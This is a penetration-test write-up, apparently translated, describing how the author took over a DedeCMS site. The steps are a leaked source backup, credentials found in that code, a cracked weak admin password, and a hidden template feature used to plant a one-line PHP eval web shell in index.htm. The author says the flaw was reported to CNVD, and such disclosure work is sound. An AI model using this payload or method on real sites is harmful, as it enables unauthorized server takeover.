Title: Record once the source code leaks to getshell (a)

0x00 Introduction

All modifications in this penetration have been restored, and the vulnerability has been submitted to the cnvd platform

0x01 Source code leak

On a dark and windy night, I was idle and started using hunter to scan the source code of the Internet site.

When viewing the backup file scan results, I saw the baby

Without saying a word, access the download to get the source code!

Traces of dedecms can be found in the annotation information

0x02 Sensitive information leakage

The first step to obtain source code is of course to get sensitive information to try global search (crtl+shift+f) keywords

key

pwd

passwd

password1. Database information leak

2. The password of the backend administrator is leaked

md5 decryption attempts to decrypt, it is actually a weak password

After having an account password, of course, you have to find the background management address. So isn’t it easy to have a source code background management address?

The background address was found in the RCE-getshell source code of the background (it was actually changed to 888)

After entering the background with the leaked admin/admin888, the version information is found to be dedecms PS1

0x03 Historical Vulnerability

Since you have obtained cms information, the first step is of course to look at its historical loopholes

Finding historical vulnerabilities of SP1 are all remote codes that contain vulnerabilities, but this site has deleted the key file install.php (it does not exist in the source code)

With luck in mind, I tried to access it again (maybe it added again later) It does not exist, so I can only continue to view other functional points

Then I also tried to test many SP2 vulnerabilities, but all failed

Continue to test other points

Continue to view and discover system settings - system basic parameters - other options include disable functions for template engines

But why did he disable the template engine function?

I looked at the source code again with this question

Sure enough, the template-related file was found again (it means that the function point is hidden and the file is still there)

Try accessing, successfully accessing and can execute normally

Then it's easy to do. According to the dedecms template rules, write the background template to payload, and access to execute PHP code.

{dede:field name='source' runphp='yes'}@eval($_POST['lyy']);{/dede:field}

//Call method [field: field name/] The key here is runphp='yes'

//The php code is a simple sentence and then delete all the disabled functions in other options to save

Because it is injected into index.htm

So the URL connected to the webshell is the home page

http://